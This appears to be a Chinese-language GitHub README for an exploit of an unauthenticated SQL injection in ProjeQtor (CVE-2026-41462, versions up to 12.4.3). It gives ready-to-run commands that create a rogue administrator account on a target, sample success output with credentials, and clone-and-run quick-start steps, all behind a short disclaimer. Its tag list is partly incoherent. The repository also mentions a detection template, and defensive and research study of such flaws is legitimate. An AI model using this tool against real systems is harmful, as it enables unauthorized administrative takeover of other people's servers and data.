0xBlackash/CVE-2026-41462
GitHub: 0xBlackash/CVE-2026-41462
针对 ProjeQtor 项目管理工具中未授权堆叠 SQL 注入漏洞(CVE-2026-41462)的自动化利用脚本与检测模板。
Stars: 0 | Forks: 0
# 🚨 CVE-2026-41462 - ProjeQtor 未授权 SQL 注入
**ProjeQtor ≤ 12.4.3 中严重的未授权 SQL 注入漏洞**
## 📌 概述
CVE-2026-41462 是 ProjeQtor 项目管理工具登录功能中存在的一个严重的未授权 SQL 注入漏洞。
- **CVE ID**:CVE-2026-41462
- **受影响版本**:ProjeQtor 7.0 至 12.4.3
- **已修复版本**:12.4.4
- **严重程度**:严重 (CVSS 9.8)
- **类型**:未授权堆叠 SQL 注入
## 🛠️ 漏洞利用
### 用法
```
python3 CVE-2026-41462.py -u http://target.com --create-admin
# 使用自定义 credentials
python3 CVE-2026-41462.py -u http://target.com --create-admin \
--username admin123 --password StrongPass2026!
```
## 📊 成功利用后的效果
当漏洞被**成功利用**时,您将看到类似于以下的输出:
```
[+] Targeting: http://target.com
[+] Sending payload to create admin user 'hacker' ...
[+] Request sent successfully.
[+] New admin created → Username: hacker | Password: Admin123!
[+] Try logging in at: http://target.com/login.php
```
### 运行漏洞利用程序后:
1. 打开浏览器并访问:
`http://target.com/login.php`
2. 使用脚本输出中显示的凭据登录。
3. 如果成功,您将进入拥有完整管理员权限的 **ProjeQtor 管理员控制面板**。
**成功指标:**
- 您可以查看所有项目、用户和系统设置
- 您可以无限制地创建/编辑/删除项目
- 新用户出现在用户管理部分
## 📁 仓库内容
| 文件 | 描述 |
|------------------------|------------------------------------------|
| `CVE-2026-41462.py` | 主漏洞利用脚本 |
| `CVE-2026-41462.yaml` | Nuclei 检测模板 |
| `README.md` | 本文档 |
## 🚀 快速开始
1. 克隆仓库:
git clone https://github.com/0xBlackash/CVE-2026-41462.git
cd CVE-2026-41462
2. 运行漏洞利用程序:
python3 CVE-2026-41462.py -u http://target.com --create-admin
3. 使用新创建的管理员账户登录。
## ⚠️ 免责声明
本工具仅用于**教育目的**和**授权渗透测试**。未经授权的使用是违法行为。
## 📄 参考资料
- [NVD - CVE-2026-41462](https://nvd.nist.gov/vuln/detail/CVE-2026-41462)
- ProjeQtor 官方补丁 (v12.4.4+)
**ProjeQtor ≤ 12.4.3 中严重的未授权 SQL 注入漏洞**
负责任的漏洞披露 • 仅限道德黑客行为
保持安全。合法测试。
保持安全。合法测试。
标签:CISA项目, CVE-2026-41462, CVSS 9.8, PoC, ProjeQtor, Web安全, 创建管理员, 协议分析, 堆叠查询注入, 多线程, 暴力破解, 未授权访问, 权限提升, 网络安全, 蓝队分析, 逆向工具, 隐私保护, 项目管理工具, 高危漏洞